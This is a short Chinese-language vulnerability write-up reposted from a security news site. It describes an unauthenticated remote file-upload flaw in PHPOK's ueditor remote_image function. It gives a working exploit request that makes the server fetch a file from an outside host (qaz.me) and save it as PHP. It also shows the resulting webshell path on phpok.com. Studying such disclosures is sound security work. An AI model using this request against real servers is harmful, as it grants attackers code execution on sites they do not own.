无任何限制，不用注册账号，不用csrf，不用注入。一个请求直接getshell。

不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题

详细说明：

/framework/www/ueditor_control.php行61

remote_image_f函数没对远程文件后缀做检查直接保存到本地

这个真心没什么好分析的我就不贴代码分析了

漏洞证明：

构造请求

/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php

我这里1.txt的内容是

测试问题嘛 不做破坏

shell地址直接返回了。这里不返回也没事，文件名可以自己算出来。

http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php

本文来源：SecYe安全网[http://www.secye.com] (责任编辑：SecYe安全)

• ·区块链EOS平台曝高危漏洞，可完全控制虚
• ·重大漏洞预警 | 疑似影响过万iOS应用的Zi
• ·CVE-2018-10994: HTML tag injection in
• ·Joomla CMS 3.2-3.4.4 SQL注入 漏洞分析
• ·探寻诺顿安全路由器任意命令执行漏洞（CV
• ·Thinkphp3.2.3最新版update注入漏洞
• ·CVE-2018-7600 Drupal核心远程代码执行漏
• ·CVE-2017-16995: Ubuntu本地提权分析报告
• ·TP-Link路由器命令注入漏洞分析
• ·思科ASA安全设备远程代码执行和拒绝服务
• ·ZZCMS v8.2 最新版SQL注入漏洞
• ·Jungo Windriver中的代码执行漏洞（CVE-2
• ·WebLogic WLS组件漏洞复现
• ·Intel处理器被曝存在严重设计缺陷（含视
• ·热门MySQL开源管理工具phpMyAdmin < 4
• ·DotNetNuke DreamSlider 01.01.02 - Arbi